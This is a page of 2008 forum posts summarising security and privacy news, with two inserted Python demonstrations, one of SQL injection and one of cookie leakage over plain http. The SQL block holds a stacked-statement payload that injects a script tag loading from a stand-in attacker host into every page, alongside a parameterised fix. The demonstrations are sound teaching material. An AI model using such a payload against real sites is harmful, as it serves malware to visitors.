

Topics - Ehtyar

126
Living Room / Vuln. Alert: QuickTime/iTunes Zero-Day BOF/RCE
« on: September 19, 2008, 04:23 PM »
Amazing that these things can still happen. The exploit uses an atypically long string to cause the application to crash (please note the use of "denial of service" in the second link) and potentially allow arbitrary remote code execution on the affected machine.

A hacker has released attack code that exploits an unpatched vulnerability in Apple Inc.'s QuickTime, just a week after the company updated the media player to plug nine other serious vulnerabilities, a security researcher said Wednesday.

The exploit, which was published on the milw0rm.com site Tuesday, takes advantage of a flaw in the "<? quicktime type= ?>" parameter in QuickTime, which is not prepared to handle excessively-long strings, said Aaron Adams, a researcher with Symantec Corp.'s DeepSight threat notification network.

Full Story
Full Story 2

Ehtyar.

127
Living Room / Blog Post: GPS Spoofing
« on: September 19, 2008, 04:15 PM »
A little paranoid, but poignant nonetheless. Hijackers can quite easily spoof GPS signals, permitting them to falsify signals sent to and from civilian GPS devices.

Our global society relies on the civilian GPS for our communications networks, transportation of goods, power distribution, financial transactions and emergency response, using precise location information and time synchronization. Unfortunately, the GPS system was not designed for this purpose. The civilian GPS has dangerous security vulnerabilities which now leave our global society at risk of serious disruption at any moment.

Full Blog

Ehtyar.

128
The procedures the TSA follows in conducting border searches of laptops may be made public under new legislation.

A U.S. lawmaker introduced a bill last week that would require the U.S. Department of Homeland Security to disclose its procedures for searching computers and devices at the border as well as produce a quarterly report of all laptops, devices and data seized by border agents.

The bill, titled the Border Security Search Accountability Act of 2008, would limit the length of time devices can be held by DHS agents and increase protections for corporate data stored on devices. In addition, individuals would be entitled to a receipt for their belongings, written confirmation if their data is copied and more information about dispute resolution. The DHS would also have to produce a quarterly report of the number of devices seized at different ports of entry.

Full Story

Ehtyar.

129
Living Room / News Article: EFF To Sue President and NSA
« on: September 19, 2008, 04:06 PM »
The EFF has filed suit against Dubya, The NSA and others in an attempt to prevent them spying on citizens via AT&T.

The Electronic Frontier Foundation, a pro-civil-liberties organization, announced on Thursday that it had filed a lawsuit against the National Security Agency, President George W. Bush and other individuals on behalf of AT&T customers, asking that unconstitutional surveillance stop.

The lawsuit aims to end the collection of data and wiretapping by the NSA targeting ordinary Americans and hold the architects of the various surveillance initiatives responsible for any violations of the U.S. Constitution, the EFF said in a statement. The lawsuit uses evidence already made public to make its case, since the Bush Administration has not been shy about using the state secrets privilege to quash past lawsuits. A previous lawsuit brought by the EFF against telecommunications giant AT&T is one of the only cases against the surveillance programs to have survived the government's legal tactics.

Full Story

Ehtyar.

130
Living Room / DonationQuote - DonationCoder Quote Database [Update]
« on: September 18, 2008, 07:20 PM »
Hi everyone. I have recently put together a place for everyone on DonationCoder to submit quotes from site members so that everyone can have a good laugh or read some philosophical thoughts etc. So far it is dominated by snippets of chat from the irc channel on EFNet however quotes can be submitted from any medium with relation to DonationCoder.

It currently works thus:
1. A user finds a quote they'd like to post. E.g. "<ioszilla> today's mousering threat level: ELEVATED".
2. They visit the DonationQuote website at http://quotes.dcmembers.com/.
3. They click the "Contribute" link in the upper right corner.
4. They add a title, insert the quote, and add their own nickname to the post.
5. A moderator checks their post and accepts it into the database. (any forum mods/irc regs are welcome to PM me for moderator login)
Users can see the latest submissions here and RSS with full quotes included here. If you'd like to get an idea of some of the quotes in the database I would recommend checking out a few random quotes here.
I'd like to thank Mouser for kindly hosting this project on the DCMembers website (PM Mouser or Gothi[c] for info.), Gothi[c] for setting up the account and pointing out how horribly insecure the script was (I am ashamed), and Joshua/Deo for recommending it. I'd also like to credit the RASH Quote Management System that the website is based on, along with a warning; this script should never be used on an openly accessible website. It is disastrously insecure and is used in this project only after some very laborious sanitation.
Lastly, have some laughs everyone!!

Ehtyar.

131
Living Room / Wired Gallery: Future Travel
« on: September 17, 2008, 04:07 AM »
Wired.com show artists' impressions of the future of travel.

Future worlds described by science fiction visionaries like Philip K. Dick, William Gibson and Robert Heinlein often included wildly inventive methods of transportation to other planets, galaxies and dimensions.

These brief glimpses into the possible future of travel were left largely to the readers' imaginations, but a flourishing group of dreamers, designers and illustrators are bringing those creations to life -- at least online.

Full Story

Ehtyar.

132
Microsoft and Cray have teamed up to release the world's most affordable supercomputer.

Impulse buyers, lock your credit cards in a drawer when you're browsing Amazon.com: You might end up purchasing a $25,000 compact supercomputer on a whim.

In an effort to make supercomputers mainstream, Microsoft and Cray teamed up to produce the Cray CX1, the "most affordable super computer Cray has ever offered." Unveiled Tuesday morning, the CX1 will run a new version of Microsoft Windows on either 32 or 64 Intel cores, and the desktop will carry 4 terabytes of storage, according to a GigaOM story. 

Full Story

Ehtyar.

133
Users who wish to certify that their Facebook apps will not violate users' expectations will soon be able to volunteer to have them vetted by Facebook.

After booting applications from Facebook this summer for violating user privacy, the social-networking company is gearing up to vet apps for trustworthiness as part of a voluntary validation program.

The validation badge will give Facebook members a gauge to use in deciding whether to add a particular app or not. Experts praise Facebook's effort, but say apps posing security risks will still be around despite that, partly because of the popularity of the network.

Full Story

Ehtyar.

134
Living Room / Vuln. Alert: Forever21 Payment Card Breach
« on: September 17, 2008, 03:54 AM »
Forever21 has had payment card details stolen from 21 stores over a four year period.

Almost 99,000 payment cards used by people shopping at Forever 21 stores may have been lifted over a four-year period by people linked to the heist of 45.6 million payment cards from customers from stores owned by TJX Companies.

On Friday, the company issued a statement on its website that said it learned of the theft from law enforcement officials more than a month earlier. The theft took place on nine specific dates from March 2004 to August of last year as part of crimes alleged in an August 5 indictment charging 11 individuals of engaging in wholesale credit card theft against stores owned by TJX and others.

Full Story

Ehtyar.

135
Living Room / News Article: Microsoft To Teach About Secure Code
« on: September 17, 2008, 03:49 AM »
Stunningly, Microsoft apparently considers itself in a position to teach others how to code securely.

After spending four years as an internal process for designing secure programs from the ground up, Microsoft's Secure Development Lifecycle could soon go mainstream.

The company on Tuesday unveiled plans to help other organizations adopt comprehensive secure coding practices through three initiatives that will go live sometime in November. The company is billing them as a way to bring SDL practices to the development masses.

Full Story

Ehtyar.

136
Living Room / Vuln. Alert: Browser 'Clickjacking'
« on: September 17, 2008, 03:47 AM »
A vulnerability has been discovered that allegedly allows an attacker to misrepresent the destination of a link on their website in order to lead the reader to a destination of the attacker's choice. The details are thus far being withheld at the behest of Adobe.

In another event for the "internet is broken" files, two prominent security researchers have pulled a scheduled talk that was to demonstrate critical holes affecting anyone who uses a browser to surf the web.

Jeremiah Grossman and Robert "RSnake" Hansen say they planned to demonstrate serious "clickjacking" vulnerabilities involving every major browser during a presentation scheduled for September 24 at OWASP's AppSec 2008 Conference in New York. They canceled their talk at the request of Adobe, one of the developers whose software is vulnerable to the weakness, they say.

Full Story

Ehtyar.

137
Living Room / Vuln. Alert: BusinessWeek SQL Injection
« on: September 17, 2008, 03:43 AM »
The BusinessWeek magazine's website has suffered an attack on an SQL injection vulnerability in its pages causing it to serve up malware.

The Web site of BusinessWeek magazine suffered a major SQL injection attack in recent days that left it hosting malware on hundreds of its pages, security vendor Sophos PLC has reported.

Once compromised by such a server hole, the attack scripts could, in principle, launch anything desired by the attacker except currently included code for automatic attacks based on JavaScript. That means a visitor could be hit by malware just by landing on one of the pages, without even interacting in any way.

Full Story
Second Reference

Ehtyar.
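The mechanism behind a mass SQL-injection defacement like the one described in the post above, as an added example that is not part of the original post or of the referenced articles: a web endpoint builds a statement by string concatenation, so an attacker-supplied value can smuggle in a second, stacked statement that appends a script tag to every stored page body. The schema, the hostname in the payload, and the endpoint are constructed for illustration; the actual BusinessWeek payload is not given on the page.

```python
import sqlite3

# Constructed marker for the injected script tag (hypothetical attacker host).
INJECTED_TAG = '<script src="http://evil.example/x.js"></script>'


def make_db():
    """Builds a tiny in-memory CMS table (constructed sample data, not a real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "views INTEGER DEFAULT 0)"
    )
    db.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Markets", "<p>Stocks rose.</p>"), ("Tech", "<p>New gadgets.</p>")],
    )
    db.commit()
    return db


def count_view_vulnerable(db, article_id):
    """Injectable: the id is pasted into the SQL text, and executescript() runs
    stacked statements, just like database drivers that allow several statements
    per call. Whatever arrives in article_id is parsed as SQL."""
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + str(article_id)
    db.executescript(sql)


def count_view_safe(db, article_id):
    """Hardened: the id is type-checked and then bound as a parameter, so the
    database never sees it as SQL syntax."""
    if not isinstance(article_id, int):
        raise ValueError("article_id must be an integer")
    db.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (article_id,))
    db.commit()


def injected_bodies(db):
    """Returns how many stored page bodies now carry the injected script tag."""
    row = db.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE ?", ("%" + INJECTED_TAG + "%",)
    ).fetchone()
    return row[0]


def demo():
    """Runs the same attacker-controlled value through both endpoints.

    The payload is a valid id followed by a stacked UPDATE that appends the
    script tag to every body column (a constructed payload in the style of the
    2008 mass-injection attacks). Returns (bodies hit via the vulnerable path,
    bodies hit via the safe path)."""
    payload = "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "'"

    db = make_db()
    count_view_vulnerable(db, payload)
    hit_vulnerable = injected_bodies(db)  # every page now serves the script

    db = make_db()
    try:
        count_view_safe(db, payload)
    except ValueError:
        pass  # rejected before it reaches the database
    hit_safe = injected_bodies(db)
    return hit_vulnerable, hit_safe


if __name__ == "__main__":
    print(demo())
```

The point of the comparison is that the safe version does not try to filter dangerous characters out of the value; it changes where the value goes (a bound parameter) so that it can never be parsed as a statement, which is what closes the "server hole" the quoted article refers to.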

138
Living Room / News Article: Comcast Sues FCC
« on: September 14, 2008, 05:36 AM »
Comcast is suing the FCC in relation to its recent loss in its battle to validate its interference with its customers' P2P traffic.

Ever since the FCC handed down its 3-2 decision against cable operator Comcast's network management techniques, Comcast has been expected to sue the FCC. Today, the cable giant made good on those predictions, filing an appeal of the FCC ruling in the DC Court of Appeals, which has jurisdiction over FCC decisions.

The appeal itself is brief: a two-page document, a cover letter, and a $450 check. But the fight that it spawns will no doubt drag on for quite some time, centering on one major question: can the FCC rule against Comcast based on a policy statement that the FCC said was not enforceable at the time?

Full Story

Ehtyar.

139
Living Room / News Article: P2P Snoops Need PI License In Michigan
« on: September 14, 2008, 05:30 AM »
Michigan recently passed a law requiring the (arguably) biggest P2P snoop to have a private investigator's license.

The RIAA's campaign against filesharers follows a standard procedure: find a computer offering files for download, get a court to force the ISP or organization that provided the computer's IP address to reveal the computer's owner, and then sue the owner. The group has contracted with MediaSentry to do the work of identifying the infringing computers, but that company's methods have been called into question in a number of states that have licensing requirements for private investigators that include the computer-based snooping required to gather the data. Michigan was one such state and, if there was any doubt about the licensing issue there, it's gone now: the state passed a law that specifically calls for computer forensics groups to be licensed.

Full Story

Ehtyar.

140
Living Room / News Article: On/Off Switch For RFID Cards
« on: September 14, 2008, 05:25 AM »
An on/off switch has been developed for RFID cards.

A U.K. firm has developed an on/off “switch” for RFID cards that could protect cardholders from being hacked. The cardholder activates the RFID transmission by squeezing the card between his thumb and forefinger when it must be scanned by a reader.

The patented polymer-based technology comprised of metal particles is embedded into a circuit and gets built into a smart card during the lamination process. When compressed, it acts as an RFID signal conductor. “The difference is that RFID is always on and being interrogated, but this is always off until the instant you want it read,” says a spokesman for Peratech, which says it’s currently in discussions with smart card vendors.

Full Story

Personal comment: Seems a little impractical to me, especially when you have the alternative of not using RFID at all staring you in the face.

Ehtyar.

141
Living Room / News Article: Anti-Spam Law Declared Unconstitutional
« on: September 14, 2008, 05:20 AM »
The Virginia Supreme Court has declared the state's anti-spam laws violate the 5th amendment.

The Virginia Supreme Court declared the state's anti-spam law unconstitutional Friday and reversed the conviction of a man once considered one of the world's most prolific spammers.

The court unanimously agreed with Jeremy Jaynes' argument that the law violates the free-speech protections of the First Amendment because it does not just restrict commercial e-mails - it restricts other unsolicited messages as well. Most other states also have anti-spam laws, and there is a federal CAN-SPAM Act as well, but those laws apply only to commercial e-mail pitches.

Full Story

Ehtyar.

142
Living Room / News Article: Firefox 3.1 To Include "Private Browsing"
« on: September 14, 2008, 05:18 AM »
Firefox 3.1 will allow users to make use of a 'private browsing' mode that will cover their online tracks.

Mozilla is jumping on the latest privacy bandwagon, with developers already working hard to ensure a new private browsing feature ships in Firefox 3.1, due to arrive at the end of 2008.

Private browsing, or “porn mode” as it’s often referred to, since that’s one of the more obvious uses, restricts the information that your browser gathers as you visit websites. Cookies are rejected, URLs are kept out of the browser history, forms are not auto-filled and pages are not cached.

Full Story

Ehtyar.

143
Living Room / News Article: YouTube Bans Terrorist Videos
« on: September 14, 2008, 05:11 AM »
YouTube has banned videos 'Intended to Incite Violence or Encourage Dangerous, Illegal Activities'.

We should all feel safer now that Google's YouTube has unveiled new guidelines that will not tolerate uploaded videos "intended to incite violence or encourage dangerous, illegal activities that have an inherent risk of serious physical harm or death."

Viewers of the popular video sharing site instead will have to use Google's search engine to find them elsewhere. Or, better yet, just turn on the boob tube and click onto any broadcast or cable network.

Full Story

Ehtyar.

144
Living Room / Vuln. Alert: Malformed URLs Crash Acrobat 9
« on: September 14, 2008, 05:03 AM »
Adobe Acrobat can suffer a denial of service or crash after being served a malformed URL.

Certain URLs can cause Adobe Acrobat 9 to suffer a denial of service or crash, says a researcher.

According to an alert from the SecuriTeam mailing list, "a vulnerability in Adobe Acrobat 9 allow attackers to cause the program to crash by providing it with a malformed URL."

Full Story

Ehtyar.

145
Living Room / Vuln. Alert: YouTube Tool Helps Spread Trojans
« on: September 14, 2008, 04:59 AM »
A new tool helps YouTubers distribute malware.

Miscreants have created a tool that dumbs down the process of using fake YouTube websites to spread malware.

The YFakeCreator tool allows budding VXers to set up a fake site and configure options such as the properties of a supposed video. Typically users are required to download a fake codec to view content, which is not actually on offer. The codec contains the malware payload which can be anything from adware to a Trojan.

The tool also includes the ability to set-up a fake error message in a bid to disguise any attack.

Full Story

Ehtyar.

146
Living Room / Vuln. Alert: "UK's Chernobyl" Spam
« on: September 14, 2008, 04:32 AM »
Spam campaign claims nuclear disaster in London, but links to malware instead.

A widespread spam campaign claims that a nuclear power plant on the outskirts of London exploded on Tuesday afternoon.

No such plant exists anywhere near London. The nearest is probably Dungeness B in south east Kent, some 77 miles (124km) by road from the capital.

The email claims to offer pictures of victims. In reality, the attached zip file is contaminated with a Trojan horse, identified by net security firm Sophos as Troj/Agent-HQE. Once the malware is installed, hackers can use it to spy on the victim's computer and steal information for financial gain.

Full Story

Ehtyar.

147
Living Room / News Article: Arizona Stops Serving Death Certs On Web
« on: September 14, 2008, 04:26 AM »
Arizona will no longer be offering copies of death certificates online amid identity theft concerns.

Arizona authorities have stopped publishing copies of death certificates on a website over concerns that the information might be used in identity theft scams.

Maricopa County - which covers the state's largest city, Phoenix - discontinued the long-standing practice of posting digital copies of death certificates last month after complaints from the general public, the Arizona Republic reports. The publication of digital certificate of death notices, which are needed to complete certain real estate transactions, was designed to reduce bureaucracy but has attracted criticism over privacy issues for years. These concerns, along with more recent ID theft worries, have prompted a rethink.

Full Story

Ehtyar.

148
Living Room / News Article: Insecure Cookies Leak Sensitive Information
« on: September 14, 2008, 04:14 AM »
Secure websites are vulnerable to a new man-in-the-middle attack that takes advantage of cookies without the secure bit set.

Websites used for email, banking, e-commerce and other sensitive applications just got even less secure with the release of a new tool that siphons users' authentication credentials - even when they're sent through supposedly secure channels.

Dubbed CookieMonster, the toolkit is used in a variety of man-in-the-middle scenarios to trick a victim's browser into turning over the authentication cookies used to gain access to user account sections of a website. Unlike an attack method known as sidejacking, it works with vulnerable websites even when a user's browsing session is encrypted from start to finish using the secure sockets layer (SSL) protocol.

Full Story

Ehtyar.
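The browser behaviour that the cookie attack in the post above relies on, as an added example that is not part of the original post and is not the CookieMonster tool: a cookie set without the Secure attribute is attached to any request to its host, including a plain http:// request that a man-in-the-middle has induced the browser to make, so the session token crosses the wire in cleartext even though the user only ever logged in over SSL. The Set-Cookie headers and the hostname bank.example are constructed for illustration, and the jar below models only the Secure rule (it ignores Path, Domain and expiry).

```python
from urllib.parse import urlsplit

# Constructed Set-Cookie headers, as a login response over https might send them.
SET_COOKIE_HEADERS = [
    "SESSIONID=7f3a9c; Path=/; HttpOnly",  # no Secure attribute: will leak over http
    "CSRFTOKEN=19de; Path=/; Secure",      # Secure: only ever sent over https
    "LANG=en; Path=/",                     # also unflagged, but not sensitive
]


def parse_set_cookie(header):
    """Splits one Set-Cookie header into (name, value, attributes).

    Attribute names are lower-cased; flag attributes such as Secure and
    HttpOnly map to True, valued ones such as Path map to their value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(headers):
    """Returns the names of cookies set without the Secure attribute; these are
    the ones a network attacker can capture by forcing one http request."""
    return [name for name, _, attrs in map(parse_set_cookie, headers)
            if not attrs.get("secure")]


class CookieJar:
    """Minimal model of the browser rule at issue: a cookie goes out on every
    request to its host unless it is marked Secure, in which case only https."""

    def __init__(self):
        self._cookies = {}  # (host, name) -> (value, attrs)

    def store(self, host, set_cookie_header):
        name, value, attrs = parse_set_cookie(set_cookie_header)
        self._cookies[(host, name)] = (value, attrs)

    def cookies_for(self, url):
        """Cookies the browser would attach to a request for url."""
        target = urlsplit(url)
        sent = {}
        for (host, name), (value, attrs) in self._cookies.items():
            if host != target.hostname:
                continue
            if attrs.get("secure") and target.scheme != "https":
                continue  # Secure cookies never travel in cleartext
            sent[name] = value
        return sent


def demo():
    """Victim logs in over https; attacker on the same network injects an
    http://bank.example/ reference into some other cleartext page the victim
    views. Returns (cookies sent on that http request, cookies sent over https)."""
    jar = CookieJar()
    for header in SET_COOKIE_HEADERS:
        jar.store("bank.example", header)
    leaked = jar.cookies_for("http://bank.example/favicon.ico")
    over_tls = jar.cookies_for("https://bank.example/account")
    return leaked, over_tls


if __name__ == "__main__":
    print("unflagged:", audit_set_cookie(SET_COOKIE_HEADERS))
    print("leaked over http:", demo()[0])
```

The fix on the server side is simply to add Secure to every cookie that authenticates the user; a site that does so still sends the cookie on the https request in the example, but the injected http request carries nothing of value.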

149
Living Room / News Article: Old News, Served Fresh
« on: September 14, 2008, 04:10 AM »
United Airlines has been hit on the stock market after Google News picked up a six-year-old news story and published it as current.

As reported by The Washington Post, this labyrinthine tale began on Saturday, when Google News indexed a United bankruptcy piece published by the Chicago Tribune way back in 2002. United filed for chapter 11 that December, but emerged from bankruptcy four years later.

Google insists the South Florida Sun-Sentinel - a Trib sister paper - republished the story at about 10:30pm Pacific Saturday evening. But the papers' parent company says Google bots must have pulled the piece from the Sun-Sentinel's online archive.

In any event, the story lacked a date stamp. So Google stamped it with the current date: September 6, 2008.

Full Story

Ehtyar.

150
DC Gamer Club / News Article: The Growing Perils Of Online Game Play
« on: September 14, 2008, 03:58 AM »
There appears to be a growing trend in exploitation of online game accounts.

As massively multiplayer online role playing games (MMORPGs) such as "World of Warcraft" (WoW) and virtual worlds such as Linden Labs' Second Life continue to attract millions of users, they have also begun to attract cybercriminals, according to a recent report from ESET, a software security vendor.

"Criminals follow the money trail, regardless if it's physical or not," Jeff Debrosse, director of research at ESET, told TechNewsWorld.

The security risk to online gamers has topped ESET's threat list for the past few months and the firm's statistics indicate the problem is growing.

Full Story

Ehtyar.
